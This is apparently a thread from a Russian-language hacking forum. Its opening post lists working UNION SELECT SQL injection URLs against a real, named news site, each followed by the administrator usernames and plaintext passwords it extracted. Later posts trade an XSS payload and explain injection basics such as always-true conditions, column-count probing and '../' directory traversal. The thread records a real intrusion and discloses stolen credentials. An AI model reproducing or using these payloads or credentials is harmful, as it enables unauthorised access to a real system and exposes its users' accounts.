2 Gidz
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+1,1--
administrator:0641
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+2,1--
admin123:admin123

http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+3,1--
ann:bkk1854
И так далее и тому подобное...

delete

Скидывай сюда переменные с полными занченями..мы попробуем сообразить как подключится.

а xss потенциальная случайно нигде в ссылку (кликабельную) не попадает?

Неа, итоговый код оказываетя потом в такой конструкции:

2 Nightmarе:

<td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td>

только что проверил в последних OPERA, IE, в FF не запахало почему-то

И что это мне даст?
В моём примере такой же алерт был рабочий, то что его можно вывести я так-же в курсе.

ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог )

1. Как понять запрос: and 1=0, или or 1=1
2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ?
3. часто, или постоянно в инексиях замечаю такое:
select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../
можете обяснить что это значит и от чего зависит длина т.е. откуда берется эти цифры.

Для кого статьи придумали?
1. 1 никогда не 0, условие не выполняется, нужно для скуль
0 равно 0, выполняется, также ноебходмо
2. минус ставится, чтобы в Бд не было такого айди дабы выводились видимые поля
3. цифры - для поиска выводимых полей. ../ - для инклуда файлов, пднятие по каталогам


Вообще, почитай статьи